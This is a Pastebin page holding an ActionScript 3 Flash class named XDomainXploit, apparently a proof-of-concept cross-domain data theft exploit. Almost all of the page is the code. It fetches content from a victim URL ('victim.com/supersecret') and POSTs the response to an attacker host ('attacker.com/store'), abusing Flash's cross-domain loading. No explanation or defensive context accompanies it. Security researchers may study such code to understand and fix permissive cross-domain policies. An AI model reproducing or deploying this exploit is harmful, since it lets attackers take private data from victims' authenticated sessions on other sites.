Guest User

Script

a guest
Jan 28th, 2015
970
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  // Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
  2. // XDomainXploit.as
  3. package {
  4. import flash.display.Sprite;
  5. import flash.events.*;
  6. import flash.net.URLRequestMethod;
  7. import flash.net.URLRequest;
  8. import flash.net.URLLoader;
  9.  
  10.  
  11. public class XDomainXploit extends Sprite {
  12. public function XDomainXploit() {
  13. // Target URL from where the data is to be retrieved
  14. var readFrom:String = "http://victim.com/supersecret";
  15. var readRequest:URLRequest = new URLRequest(readFrom);
  16. var getLoader:URLLoader = new URLLoader();
  17. getLoader.addEventListener(Event.COMPLETE, eventHandler);
  18. try {
  19. getLoader.load(readRequest);
  20. } catch (error:Error) {
  21. trace("Error loading URL: " + error);
  22. }
  23. }
  24.  
  25.  
  26. private function eventHandler(event:Event):void {
  27. // URL to which retrieved data is to be sent
  28. var sendTo:String = "http://attacker.com/store"
  29. var sendRequest:URLRequest = new URLRequest(sendTo);
  30. sendRequest.method = URLRequestMethod.POST;
  31. sendRequest.data = event.target.data;
  32. var sendLoader:URLLoader = new URLLoader();
  33. try {
  34. sendLoader.load(sendRequest);
  35. } catch (error:Error) {
  36. trace("Error loading URL: " + error);
  37. }
  38. }
  39. }
  40. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×